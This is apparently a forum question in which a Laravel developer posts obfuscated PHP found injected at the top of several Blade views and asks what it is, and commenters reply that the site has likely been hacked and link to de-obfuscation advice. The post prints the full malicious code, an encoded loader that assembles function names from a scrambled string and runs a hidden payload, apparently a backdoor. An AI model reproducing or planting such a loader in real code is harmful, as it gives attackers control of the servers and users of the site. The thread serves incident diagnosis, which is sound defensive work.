# Anyone know what is this strange code on top of my laravel blade views

Tags: php, laravel-5, laravel-blade

somehow this code appeared on few of my blade views. Anyone knows what it is?
I removed it and nothing happened, so i guess it's not needed.

```
    <?php $vlkwuvd = 'udovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg)e:56-xr.985:52985-t.98]K4]65]D8]86]y3^nbsbq%  x5cSFWSFT`%}X;!sp!*#opo#>>}j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE!>!2p%Z<^2   x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1G]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;GLOBALS["    x61 156 x75 156 x61"]-u%!-#2#/#%#/#o]#/*)323b!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmsvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;275]y83]273]y76]277#<!%topjudovg}x;0]=])0#)U!   x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]2bE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!op-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%f1]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52978M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8mplode(array_map("axeoqld",str_split("%tjw!>!#]y84]275]y83]248z)  x24]25  x24-    x24-!%  x24-    x24*!|! x24ction axeoqld($n){return chr(ord($n)-1);} @error_report<pd%w6Z6<.4`hA    x27pd%6<pd%w6Z6<.3`hA   x27pd%6<37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]64Ypp3)%cB%iN}#-!   x24/%tmw/   x24)%c*W%eNfs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,*127-UVPFNJU,6<*27-SFGTOBSUO6<.fmjgA x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs%w6<   x   x6f 142 x5f 163 x74 141 x72 164") && (!isset($mdXA6|7**197-2qj%7-K)udfoopdXA    x22)7gj6<*QDU`MPT7-NBF%)7fmjix6<C   x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#ovt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bu24    x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((strst)))) { $GLOBALS[" x61 156 m%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]  156 x63 164 x69 157 x6e"; funSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6<  x7fw6*3qj%7>    x2272qj%)7#00;quui#>.%!<***f    x27,*e  x27,*d  x27,*cs!>!bssbz)#44ec:649#-!#:618d5f9#-!]254]y76#<!%w:!>!(%w:!>!    x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssb!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h!dt = $qgpvqwc("", $hnxctxp);2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tw]y83]256]y81]265]y72x22)!gj}1~!<2p%   x7f!~!<##x7f!<X>b%Z<#opo#>b%!*##>>X)]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftp#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Y- x24 x5c%j^  x24-    x24tvctus)% x24-    x24b!>!%yy)#}#-#    #fubfsdXk5`{66~6<&w6<   x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA    x27&UPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b% opjudovg}{;#)tutjyf`op4 x24-    x24]y8  x24-    x24]26  x27,*b  x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxp6M7]K3#<%yy>#]D6]281L1#/)ufttj  x22)gj6<^#Y#    x5cq%   x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*  x7f_*pd%w6Z6<.2`hA  x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqk3`{666~6<&w6<  x7fw6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;fuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x   x22l:!}V;3q%}U;ys+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbss!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<  x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpzbe!-#jt0*?]+^?]_    x5c}X   x24<!%tmw!>!#]y84]|7**111127-K)ebfsX    x27ux75 156 x61"]=1; $uas=strtolower($_SERVER[" x48 1pusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5pp2)%zB%z>!  x24/%tmw/   x24)%zW%h>EzH<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`m{h%)tpqsut>j%!*72!   xSVUFS,6<*msv%7-MSV,6<*)ujojR   x27id%6<    x7fw6*  x7f_*#ujojRyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6tutjyf`4   x223}!+!<+{e%27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!  x2/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!)%tww**WYsboepn)%bss-%rxB%h>#]y3    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%judovg!|!**#j{hnpd#)tutjyf`opjudovg 1]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]f2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));$tmuru%)s%>/h%:<**#57]38y]47]67y]37]88y7!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*M5]67]452]88]5]48]32M3]317]445]212]4ofmy%)utjm!|!*5!  x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutc]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmwmpusut!-#j0#!/!**#sfmcnbif((function_exists("b:>1<!fmtf!%b:>%s:   x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:O    x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/ x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubq#   x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24yuyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uo+#Qi x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbs48L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53L,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r    x5cV    x7f<*X&Z&S{ftmfV    x7f<*XAZASV<*wgj6<**2qj%)hopm3qjA)qj3hopmA!gj<*#k#)usbut`cpV    x7f x7f x7f x7f<u%V x27{ftmf $tmurudt();}}  x24-    x24<%j,,*!| x24-    x24gvodujpo!    x24-    x24y7   x24-77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]Dx5cq%  x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr#    x5cq%r($uas,"   x6d 163 x69 145")) or (strstr($uas,"    x72 166 x3a 61  x31")judovg)!gj!|!*msv%)}k~~~<ftmbg!osvuw!>!    x2400~:<h%_t%:osvufs:~:<*9-1-rR;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#}_;#)323ldfid>}&;!osvufs}+*!*+fepdfe{h+{d%)+opj6]36]73]83]238M7]381]211ing(0); $hnxctxp = id816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FQc:W~!%z!>2<!gps)%j>17fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x27tfs%6<*17-SFEBFI,6<#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6d]53]Kc]55Ld]55#*<%bG9dov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#))) { $qgpvqwc = "  x63 162 x65 141 x74 145 x5f 146 x75*<!~!    x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# x24*<!%t::!>!   x245]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss   x5csboe))1}:}.}-}!#*<%nfd>%fdy<Cb*  x7f;!opjudovg}k~~9{d%:osvufs:~928>>>2<!%ww2)%w`TW~  x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsrhffjsyw';

 $wcicxlmr=explode(chr((477-357)),substr($vlkwuvd,(29446-23569),(120-86))); 

 $yomgzrdx = $wcicxlmr[0]($wcicxlmr[(6-5)]); 
 $gmfpovtdb = $wcicxlmr[0]($wcicxlmr[(8-6)]); 

 if (!function_exists('ftpasubn')) { 
    function ftpasubn($uugsjvh, $gagsdbne,$gtvryhv) { 
        $ksosisw = NULL; 
        for($dtryzkw=0;$dtryzkw<(sizeof($uugsjvh)/2);$dtryzkw++) { 
            $ksosisw .= substr($gagsdbne, $uugsjvh[($dtryzkw*2)],$uugsjvh[($dtryzkw*2)+(3-2)]); 
            } 
        return $gtvryhv(chr((60-51)),chr((471-379)),$ksosisw); 
        }; 
    } 

 $blbbflypic = explode(chr((166-122)),'4228,21,1258,47,276,31,1533,26,3139,49,1464,69,5022,66,5570,53,1617,30,938,55,5271,20,838,62,2097,20,1777,60,993,45,2668,68,3463,57,3116,23,1358,61,2169,44,1305,53,1647,57,4793,28,4380,66,4974,48,2605,63,2319,59,1205,53,5372,63,1177,28,3407,56,2736,65,3324,63,384,66,1938,61,2438,22,5088,35,1121,56,119,41,3387,20,3542,48,3963,62,4061,63,1419,45,562,37,3770,36,2117,25,160,54,4315,65,1704,39,2485,58,2543,38,4204,24,2854,46,330,54,3188,54,5291,60,2378,60,2142,27,2900,61,4507,50,84,35,5158,67,5785,36,3026,48,5500,70,3520,22,5225,22,0,47,4821,47,4760,33,2961,65,4557,41,2801,53,214,62,474,53,307,23,3074,42,450,24,2027,70,5123,35,3930,33,4124,39,1559,58,1038,45,1837,43,1880,58,900,38,2267,52,4446,61,2460,25,4882,51,3680,45,5623,68,1083,38,4598,65,1743,34,2213,54,3242,35,4713,47,4163,41,3648,32,656,64,47,37,3806,67,4933,41,2581,24,5435,43,527,35,4663,50,5478,22,5761,24,776,62,720,56,5247,24,4025,36,5691,70,3590,58,3725,45,4249,66,5351,21,3277,47,5821,56,599,57,3873,57,1999,28,4868,14');

 $rwgmdpo = $yomgzrdx("",ftpasubn($blbbflypic,$vlkwuvd,$gmfpovtdb)); 
 $yomgzrdx=$vlkwuvd; 
 $rwgmdpo(""); 
 $rwgmdpo=(627-506); 
 $vlkwuvd=$rwgmdpo-1; 
 ?>
```

thanx in advance!
Br
Y

Comment: you have probably been hacked, you may want to stop that happening

Comment: i was afraid of that, although nothing (visible) happened... i found similar code on few more .php files (routes.php for example)

Comment: you can take it apart and find whats in it, but i couldent be bothered myself

Comment: [See this](https://security.stackexchange.com/questions/115461/i-found-unknown-php-code-on-my-server-how-do-i-de-obfuscate-the-code) thread on Security SE for ways of decoding possibly malicious PHP